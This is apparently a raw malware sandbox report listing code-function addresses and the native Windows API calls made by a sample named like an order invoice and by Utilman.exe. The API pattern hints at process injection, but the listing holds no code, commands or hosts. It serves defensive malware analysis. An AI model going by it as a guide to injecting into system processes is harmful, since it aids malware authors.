                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BF0 NtAllocateVirtualMemory,5_2_01942BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BE0 NtQueryValueKey,5_2_01942BE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AB0 NtWaitForSingleObject,5_2_01942AB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AD0 NtReadFile,5_2_01942AD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AF0 NtWriteFile,5_2_01942AF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DB0 NtEnumerateKey,5_2_01942DB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DD0 NtDelayExecution,5_2_01942DD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D10 NtMapViewOfSection,5_2_01942D10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D00 NtSetInformationFile,5_2_01942D00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D30 NtUnmapViewOfSection,5_2_01942D30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CA0 NtQueryInformationToken,5_2_01942CA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CC0 NtQueryVirtualMemory,5_2_01942CC0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CF0 NtOpenProcess,5_2_01942CF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C00 NtQueryInformationProcess,5_2_01942C00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C60 NtCreateKey,5_2_01942C60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F90 NtProtectVirtualMemory,5_2_01942F90
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FB0 NtResumeThread,5_2_01942FB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FA0 NtQuerySection,5_2_01942FA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FE0 NtCreateFile,5_2_01942FE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F30 NtCreateSection,5_2_01942F30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F60 NtCreateProcessEx,5_2_01942F60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942E80 NtReadVirtualMemory,5_2_01942E80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942EA0 NtAdjustPrivilegesToken,5_2_01942EA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942EE0 NtQueueApcThread,5_2_01942EE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942E30 NtWriteVirtualMemory,5_2_01942E30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943090 NtSetValueKey,5_2_01943090
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943010 NtOpenDirectoryObject,5_2_01943010
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019439B0 NtGetContextThread,5_2_019439B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943D10 NtOpenProcessToken,5_2_01943D10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943D70 NtOpenThread,5_2_01943D70
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05124650 NtSuspendThread,LdrInitializeThunk,7_2_05124650
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05124340 NtSetContextThread,LdrInitializeThunk,7_2_05124340
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05122D10
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05122D30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122DD0 NtDelayExecution,LdrInitializeThunk,7_2_05122DD0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05122DF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05122C70
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122C60 NtCreateKey,LdrInitializeThunk,7_2_05122C60
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05122CA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122F30 NtCreateSection,LdrInitializeThunk,7_2_05122F30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122FB0 NtResumeThread,LdrInitializeThunk,7_2_05122FB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122FE0 NtCreateFile,LdrInitializeThunk,7_2_05122FE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05122E80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05122EE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122B60 NtClose,LdrInitializeThunk,7_2_05122B60
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05122BA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05122BF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05122BE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122AD0 NtReadFile,LdrInitializeThunk,7_2_05122AD0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122AF0 NtWriteFile,LdrInitializeThunk,7_2_05122AF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051235C0 NtCreateMutant,LdrInitializeThunk,7_2_051235C0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051239B0 NtGetContextThread,LdrInitializeThunk,7_2_051239B0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122D00 NtSetInformationFile,7_2_05122D00
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122DB0 NtEnumerateKey,7_2_05122DB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122C00 NtQueryInformationProcess,7_2_05122C00
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122CC0 NtQueryVirtualMemory,7_2_05122CC0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122CF0 NtOpenProcess,7_2_05122CF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122F60 NtCreateProcessEx,7_2_05122F60
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122F90 NtProtectVirtualMemory,7_2_05122F90
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122FA0 NtQuerySection,7_2_05122FA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122E30 NtWriteVirtualMemory,7_2_05122E30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122EA0 NtAdjustPrivilegesToken,7_2_05122EA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122B80 NtQueryInformationFile,7_2_05122B80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122AB0 NtWaitForSingleObject,7_2_05122AB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05123010 NtOpenDirectoryObject,7_2_05123010
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05123090 NtSetValueKey,7_2_05123090
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05123D10 NtOpenProcessToken,7_2_05123D10
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05123D70 NtOpenThread,7_2_05123D70
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032293E0 NtCreateFile,7_2_032293E0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03229640 NtDeleteFile,7_2_03229640
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032296E0 NtClose,7_2_032296E0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03229550 NtReadFile,7_2_03229550
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03229840 NtAllocateVirtualMemory,7_2_03229840
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540FB5E NtSetContextThread,7_2_0540FB5E
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540FA63 NtSetContextThread,NtResumeThread,7_2_0540FA63
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_0173D88C0_2_0173D88C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_0783AA100_2_0783AA10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_078343F80_2_078343F8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_078363100_2_07836310
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07834C680_2_07834C68
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07836BE80_2_07836BE8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_078348300_2_07834830
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EFBF300_2_07EFBF30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF0BE40_2_07EF0BE4
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF99F80_2_07EF99F8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF97000_2_07EF9700
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF97100_2_07EF9710
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF2DD90_2_07EF2DD9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF0BDE0_2_07EF0BDE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07EF99E90_2_07EF99E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00418C135_2_00418C13
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0040482E5_2_0040482E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004011C05_2_004011C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0042F2E35_2_0042F2E3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00402AA05_2_00402AA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004033405_2_00403340
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004103B05_2_004103B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004103B35_2_004103B3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004105D35_2_004105D3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0040E5B35_2_0040E5B3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00416DBC5_2_00416DBC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00416E035_2_00416E03
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00416E025_2_00416E02
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0040E6FB5_2_0040E6FB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004027685_2_00402768
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004027705_2_00402770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0040E7035_2_0040E703
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D01AA5_2_019D01AA
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C41A25_2_019C41A2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C81CC5_2_019C81CC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AA1185_2_019AA118
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019001005_2_01900100
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019981585_2_01998158
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A20005_2_019A2000
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E3F05_2_0191E3F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D03E65_2_019D03E6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CA3525_2_019CA352
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019902C05_2_019902C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B02745_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D05915_2_019D0591
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019105355_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BE4F65_2_019BE4F6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B44205_2_019B4420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C24465_2_019C2446
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190C7C05_2_0190C7C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019347505_2_01934750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019107705_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192C6E05_2_0192C6E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A05_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019DA9A65_2_019DA9A6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019269625_2_01926962
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F68B85_2_018F68B8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E8F05_2_0193E8F0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191A8405_2_0191A840
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019128405_2_01912840
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C6BD75_2_019C6BD7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CAB405_2_019CAB40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA805_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01928DBF5_2_01928DBF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190ADE05_2_0190ADE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019ACD1F5_2_019ACD1F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191AD005_2_0191AD00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0CB55_2_019B0CB5
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900CF25_2_01900CF2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910C005_2_01910C00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198EFA05_2_0198EFA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902FC85_2_01902FC8
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191CFE05_2_0191CFE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01930F305_2_01930F30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B2F305_2_019B2F30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01952F285_2_01952F28
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01984F405_2_01984F40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922E905_2_01922E90
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CCE935_2_019CCE93
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CEEDB5_2_019CEEDB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CEE265_2_019CEE26
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910E595_2_01910E59
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191B1B05_2_0191B1B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019DB16B5_2_019DB16B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194516C5_2_0194516C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FF1725_2_018FF172
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019170C05_2_019170C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BF0CC5_2_019BF0CC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C70E95_2_019C70E9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CF0E05_2_019CF0E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0195739A5_2_0195739A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C132D5_2_019C132D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FD34C5_2_018FD34C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019152A05_2_019152A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192B2C05_2_0192B2C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B12ED5_2_019B12ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AD5B05_2_019AD5B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D95C35_2_019D95C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C75715_2_019C7571
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CF43F5_2_019CF43F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019014605_2_01901460
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CF7B05_2_019CF7B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C16CC5_2_019C16CC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019556305_2_01955630
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A59105_2_019A5910
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019199505_2_01919950
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192B9505_2_0192B950
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019138E05_2_019138E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197D8005_2_0197D800
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192FB805_2_0192FB80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01985BF05_2_01985BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194DBF95_2_0194DBF9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CFB765_2_019CFB76
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01955AA05_2_01955AA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019ADAAC5_2_019ADAAC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B1AA35_2_019B1AA3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BDAC65_2_019BDAC6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CFA495_2_019CFA49
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C7A465_2_019C7A46
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01983A6C5_2_01983A6C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192FDC05_2_0192FDC0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C1D5A5_2_019C1D5A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01913D405_2_01913D40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C7D735_2_019C7D73
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CFCF25_2_019CFCF2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01989C325_2_01989C32
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01911F925_2_01911F92
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CFFB15_2_019CFFB1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018D3FD55_2_018D3FD5
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018D3FD25_2_018D3FD2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CFF095_2_019CFF09
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01919EB05_2_01919EB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F05357_2_050F0535
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051B05917_2_051B0591
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051944207_2_05194420
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A24467_2_051A2446
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0519E4F67_2_0519E4F6
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051147507_2_05114750
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F07707_2_050F0770
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050EC7C07_2_050EC7C0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0510C6E07_2_0510C6E0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0518A1187_2_0518A118
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050E01007_2_050E0100
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051781587_2_05178158
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051B01AA7_2_051B01AA
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A41A27_2_051A41A2
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A81CC7_2_051A81CC
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051820007_2_05182000
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AA3527_2_051AA352
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051B03E67_2_051B03E6
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050FE3F07_2_050FE3F0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051902747_2_05190274
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051702C07_2_051702C0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0518CD1F7_2_0518CD1F
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050FAD007_2_050FAD00
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05108DBF7_2_05108DBF
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050EADE07_2_050EADE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F0C007_2_050F0C00
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05190CB57_2_05190CB5
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050E0CF27_2_050E0CF2
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05110F307_2_05110F30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05192F307_2_05192F30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05132F287_2_05132F28
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05164F407_2_05164F40
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0516EFA07_2_0516EFA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050E2FC87_2_050E2FC8
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050FCFE07_2_050FCFE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AEE267_2_051AEE26
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F0E597_2_050F0E59
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05102E907_2_05102E90
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051ACE937_2_051ACE93
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AEEDB7_2_051AEEDB
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051069627_2_05106962
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F29A07_2_050F29A0
